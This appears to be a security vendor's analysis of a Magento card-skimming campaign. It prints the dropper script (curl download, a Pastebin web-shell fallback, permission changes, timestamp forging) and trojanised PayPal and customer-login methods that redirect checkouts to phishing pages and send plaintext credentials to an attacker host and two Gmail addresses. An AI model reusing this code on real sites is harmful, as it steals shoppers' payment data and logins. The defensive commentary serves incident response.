Attackers are increasingly abusing the package-upload function of the Magento Connect Manager (the /downloader/ component) to install card-stealing code on e-commerce websites that run Magento, one of the most popular e-commerce platforms, owned by eBay at the time of writing.
Magento Auto Logger & Patcher
First, the malware script tries to download patcher.zip with curl:
### Start Patching ###
// [analysis] Fetch the attacker's "patch" archive. $linkpatch / $namepatch are
// set earlier in the script and executebin() is the script's own shell wrapper;
// neither is shown in this excerpt. `curl -O` saves into the current working
// directory, which appears to be the Magento web root ($dir) -- confirm.
/* Download */
executebin('curl -O '.$linkpatch);
/* Extract */
if (file_exists($namepatch)) {
    echo "<br/>[+] $namepatch DOWNLOADED!";
} else {
    // [analysis] Fallback when the archive cannot be fetched: pull a PHP web
    // shell from a Pastebin raw URL and write it to js/backup.php, presumably
    // because a static-asset directory is rarely searched for PHP files.
    echo "<br/><font color=red>[!] $namepatch NOT FOUND!</font>";
    $backdoor = file_get_contents("http://pastebin.com/raw/[SECRET]");
    $backdoor_f = fopen($dir."/js/backup.php", "w");
    fwrite($backdoor_f, $backdoor);
    fclose($backdoor_f);
    echo "<br/>[+] Backdoor UPLOADED!";
}
// [analysis] Make the Connect Manager directory world-writable, delete its
// entry point (and any earlier downloader/backup.php -- purpose not clear from
// here), then unpack the archive over the installation. IR indicators: mode
// 0777 on /downloader, a missing downloader/index.php, an unexpected
// js/backup.php, and an outbound request to pastebin.com from the web tier.
@chmod($dir."/downloader/", 0777);
@unlink($dir."/downloader/index.php");
@unlink($dir."/downloader/backup.php");
executebin('unzip '.$namepatch);
If the download fails, it instead fetches a PHP command shell from a Pastebin raw URL and writes it to js/backup.php for remote access. In either case it then makes /downloader/ world-writable and deletes the original downloader/index.php before unpacking the archive.
Logger Creator
### Logger Creator ###
// [analysis] Installs the skimmers by overwriting core Magento model files with
// copies fetched from the attacker's server.
$dir = $_SERVER['DOCUMENT_ROOT'];
// String concatenation hides the call to base64_decode() from simple greps.
$b64 = "base"."64"."_"."de"."code";
$path = '/app/code/core/Mage';
// Base URL of the server hosting the replacement files (redacted, base64-encoded).
$link = $b64('[SECRET]');
// Card logger: targets Mage/Payment/Model/Method/ (Cc.php and Abstract.php).
// patch() is the script's own helper and is not shown; how it uses $name_a
// versus $file_a cannot be determined from this excerpt.
$path_a = $dir.$path.'/Payment/Model/Method/';
$name_a = 'Cc.php';
$file_a = 'Abstract.php';
$link_a = $link.'[SECRET]';
patch($path_a,$name_a,$file_a,$link_a);
echo "<br/>[+] Card Logger DONE!";
// ". ." marks lines elided from the original listing.
. .
echo "<br/>[+] Customer Logger DONE!";
. .
echo "<br/>[+] Admin Logger DONE!";
. .
// [analysis] PayPal replacement. $size_e / $size_d and the $*_d variables are
// set in the elided part; by the names they look like file sizes used to pick
// the replacement variant that matches the installed Magento version (note the
// loose == against the string '4096') -- confirm against the full sample.
if($size_e == $size_d) {
    patch($path_d,$name_d,$file_d,$link_d);
    echo "<br/>[+] PayPal Direct Scam DONE!";
} elseif($size_e == '4096') {
    patch($path_d,$name_d,$file_d,$link_e);
    echo "<br/>[+] PayPal Direct Scam DONE!";
} else {
    echo "<br/><font color=red>[!] PayPal Direct Scam FAILED / ".$size_e."</font>";
}
Patch ShopLift
It then tries to close the older Magento "ShopLift" remote code execution (RCE) vulnerability by deleting the affected controller file — presumably to keep rival attackers out of the same store rather than to help the victim.
/* Patch ShopLift */
// [analysis] Deletes the Adminhtml CMS WYSIWYG controller that the "ShopLift"
// RCE went through. This is not a real fix: it breaks admin functionality and
// the absence of this core file is itself a compromise indicator. Compare the
// core tree against a clean install of the same version during IR.
@unlink($dir."/app/code/core/Mage/Adminhtml/controllers/Cms/WysiwygController.php");
echo "<br/>[+] ShopLift PATCHED!";
Touching Files
After that it runs `touch -r` over almost all files, copying the timestamps of untouched files onto the modified ones so that a search for recently modified files does not reveal which files were changed:
echo "<br/>[+] Touching Files";
// [analysis] Anti-forensics. `touch -r REF TARGET` copies REF's access and
// modification times onto TARGET, so the replaced core files no longer stand
// out to `find -mtime` or mtime-sorted listings. touch cannot rewrite ctime,
// so compare ctime, or better, a file-integrity baseline, when investigating.
// ". . ." marks lines elided from the original listing.
executebin('touch -r cron.sh app/');
executebin('touch -r app/locale/ app/code/');
. . .
// js/calendar/calendar.php and xml.php do not appear to be stock Magento
// files; they are likely attacker-dropped -- verify against a clean tree.
executebin('touch -r js/calendar/calendar.js js/calendar/calendar.php');
executebin('touch -r cron.sh xml.php');
Deleting and Cleaning
Finally it deletes the downloaded patch archive ($namepatch) to cover its tracks:
/* Delete */
// [analysis] Removes the downloaded archive ($namepatch, e.g. patcher.zip)
// once its contents have been unpacked, so the dropper itself leaves no file
// behind; the installed skimmers stay in place.
executebin('rm -rf '.$namepatch);
if (file_exists($namepatch)) {
    echo "<br/><font color=red>[!] $namepatch FOUND!</font>";
} else {
    echo "<br/>[+] $namepatch DELETED!";
}
Paypal Model/Config.php
The patched getPaypalUrl() redirects PayPal checkouts to an attacker-controlled phishing page in order to steal payment information:
/**
 * PayPal web URL generic getter
 *
 * [analysis] Trojanised version of the PayPal config model's URL getter. The
 * stock method only builds the paypal.com URL; this one first POSTs to the
 * attacker's server and checks whether the shopper's IP appears in
 * "victims.txt". If it does, the genuine PayPal URL is returned (presumably so
 * an already-phished shopper is not shown the fake page twice); otherwise the
 * phishing URL is fetched from "url.txt" and returned instead. Every checkout
 * therefore causes two outbound POSTs to socialplanners.com.mx from the web
 * tier -- that egress is the detection signal.
 *
 * @param array $params
 * @return string
 */
public function getPaypalUrl(array $params = array())
{
    $evil_destination = "http://socialplanners.com.mx/scammers/";
    // Variable names are Indonesian/Malay: "korban" = victim, "situs" = site.
    $ip_korban = $_SERVER['REMOTE_ADDR'];
    $situs = $evil_destination."victims.txt";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $situs);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT,30);
    curl_setopt($ch, CURLOPT_POST, 1);
    $preg_view = curl_exec($ch);
    curl_close($ch);
    // The IP is interpolated into the pattern unescaped, so "." matches any byte.
    if(preg_match("#".$ip_korban."#", $preg_view)) {
        return sprintf('https://www.%spaypal.com/cgi-bin/webscr%s',
            $this->sandboxFlag ? 'sandbox.' : '',
            $params ? '?' . http_build_query($params) : ''
        );
    } else {
        $situs = $evil_destination."url.txt";
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $situs);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_TIMEOUT,30);
        curl_setopt($ch, CURLOPT_POST, 1);
        $paypal_fake = curl_exec($ch);
        curl_close($ch);
        // The fetched URL is used as the sprintf format string with the same
        // two arguments, so url.txt is expected to carry %s placeholders. If
        // the C2 is unreachable curl_exec() returns false and this yields an
        // empty string: checkout silently breaks, which is itself a useful
        // symptom to look for.
        return sprintf($paypal_fake,
            $this->sandboxFlag ? 'sandbox.' : '',
            $params ? '?' . http_build_query($params) : ''
        );
    }
}
Customer/Model/Session.php
The patched login() method steals customer credentials on every successful login and e-mails them to the attackers' gmail.com accounts:
email: kosowar8@gmail.com
email: 1v4n.1v4n4usqu1@gmail.com
/**
 * Customer authorization
 *
 * [analysis] Trojanised customer session login(). After authenticate()
 * succeeds it geolocates the client through ip-api.com, sends the plaintext
 * username and password to the attacker's "mail_chk" endpoint twice (the
 * responses are labelled "Email" and "PayPal" in the report, so apparently the
 * C2 classifies the address and tests the credentials elsewhere), then mails
 * everything to two Gmail addresses via an obfuscated mail() call. Only then
 * does the normal login complete, so the victim sees no error. Outbound
 * requests to ip-api.com and socialplanners.com.mx from the web tier at login
 * time, and mail() calls from the PHP process, are the detection signals.
 *
 * @param string $username
 * @param string $password
 * @return bool
 */
public function login($username, $password)
{
    /** @var $customer Mage_Customer_Model_Customer */
    $customer = Mage::getModel('customer/customer')
        ->setWebsiteId(Mage::app()->getStore()->getWebsiteId());
    if ($customer->authenticate($username, $password)) {
        // [analysis] Everything from here to setCustomerAsLoggedIn() is injected.
        $srv = $_SERVER['HTTP_HOST'];
        $ips = $_SERVER['REMOTE_ADDR'];
        $uag = $_SERVER['HTTP_USER_AGENT'];
        // Geolocate the victim via the public ip-api.com service. If that call
        // fails, json_decode() returns null and the property reads below only
        // raise a notice; the login still goes through.
        $getip = 'http://ip-api.com/json/' . $ips;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $getip);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
        $content = curl_exec($curl);
        curl_close($curl);
        $details = json_decode($content);
        $country_codes = $details->countryCode;
        if(empty($country_codes)) {
            $country_code = "XX";
        } else {
            $country_code = $country_codes;
        }
        $country_name = $details->country;
        // Plaintext credentials leave the server in an HTTP GET query string,
        // so they will also appear in any proxy, IDS or C2-side access log.
        $chksrv = "http://socialplanners.com.mx/mail_chk/";
        $chkmail = file_get_contents($chksrv."?e=$username&p=$password");
        if($chkmail == "") {
            $mailchk = "Unknown";
        } else {
            $mailchk = $chkmail;
        }
        // Second check, reported under the "PayPal" label below.
        $chkvalid = file_get_contents($chksrv."valid.php?email=$username&pass=$password");
        if($chkvalid == "") {
            $ppchk = "Unknown";
        } else {
            $ppchk = $chkvalid;
        }
        // Obfuscated base64_decode() and mail(). $key decodes to the two
        // comma-separated recipients kosowar8@gmail.com and
        // 1v4n.1v4n4usqu1@gmail.com.
        $id = "ba"."se"."64"."_"."de"."co"."de";
        $db = "ma"."il";
        $key = $id("a29zb3dhcjhAZ21haWwuY29tLDF2NG4uMXY0bjR1c3F1MUBnbWFpbC5jb20=");
        $auth = "Account : ".$username."|".$password."\nInfo : ".$ppchk." PayPal - ".$mailchk." Email\n\nIP Info : ".$ips." | ".$country_name." On ".date('r')."\nBrowser : ".$uag."\nSite : ".$srv."";
        $subjk = "".$ppchk." PayPal - ".$mailchk." Email [".$srv." - ".$ips."]";
        // The victim's username is placed unescaped in the From: header.
        $headr = "From: ".$country_code." User <".$username.">";
        $db($key, $subjk, $auth, $headr);
        // [analysis] End of injected code; the stock login path resumes.
        $this->setCustomerAsLoggedIn($customer);
        $this->renewSession();
        return true;
    }
    return false;
}
Final words
Websites using the Malware Expert – ModSecurity rules are protected against this threat.
Use Malware Expert – Signatures to detect these malware files for free!